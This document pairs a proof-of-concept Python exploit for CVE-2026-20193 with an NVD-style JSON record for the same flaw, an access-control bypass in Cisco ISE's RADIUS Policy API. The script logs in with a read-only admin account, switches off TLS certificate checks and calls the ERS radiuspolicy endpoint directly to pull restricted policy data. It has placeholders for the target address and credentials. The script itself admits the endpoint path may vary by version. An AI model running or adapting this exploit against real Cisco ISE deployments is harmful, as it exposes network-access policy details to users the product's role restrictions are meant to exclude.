CVE-2026-20193

import requests import urllib3 # Suppress SSL warnings for demonstration purposes urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def exploit_cve_2026_20193(target_ip, username, password): """ PoC for CVE-2026-20193: Cisco ISE RADIUS Policy API Bypass Attempts to access sensitive policy details using a read-only admin account. """ session = requests.Session() # Step 1: Authenticate to the Cisco ISE portal login_url = f"https://{target_ip}:9060/admin/login" login_payload = { "username": username, "password": password } try: print(f"[*] Attempting login to {target_ip} as {username}...") response = session.post(login_url, data=login_payload, verify=False) if response.status_code != 200: print("[-] Login failed.") return print("[+] Login successful.") # Step 2: Directly call the vulnerable RADIUS Policy API endpoint # Note: The exact endpoint path may vary based on ISE version api_endpoint = f"https://{target_ip}:9060/ers/config/radiuspolicy" headers = { "Accept": "application/json", "Content-Type": "application/json" } print(f"[*] Sending request to vulnerable endpoint: {api_endpoint}") poc_response = session.get(api_endpoint, headers=headers, verify=False) if poc_response.status_code == 200: print("[+] Exploit successful! Sensitive data retrieved:") print(poc_response.text) else: print(f"[-] Request failed. Status code: {poc_response.status_code}") print(poc_response.text) except Exception as e: print(f"[!] An error occurred: {e}") if __name__ == "__main__": # Replace with actual target details TARGET_IP = "192.168.1.100" USERNAME = "readonly_admin" PASSWORD = "password" exploit_cve_2026_20193(TARGET_IP, USERNAME, PASSWORD)

{"cve": {"id": "CVE-2026-20193", "sourceIdentifier": "[email protected]", "published": "2026-05-06T17:16:21.500", "lastModified": "2026-05-06T18:59:53.230", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability in the RADIUS Policy API endpoints of Cisco ISE could allow an authenticated, remote attacker with read-only Administrator privileges to gain unauthorized access to sensitive information on an affected device.\r\n\r\nThis vulnerability is due to improper role-based access control (RBAC) permissions on the RADIUS Policy API endpoints. An attacker could exploit this vulnerability by bypassing the web-based management interface and directly calling an affected endpoint. A successful exploit could allow the attacker to gain unauthorized read access to sensitive RADIUS Policy details that are restricted for their role."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-unauth-bypass-uxjRXGpb", "source": "[email protected]"}]}}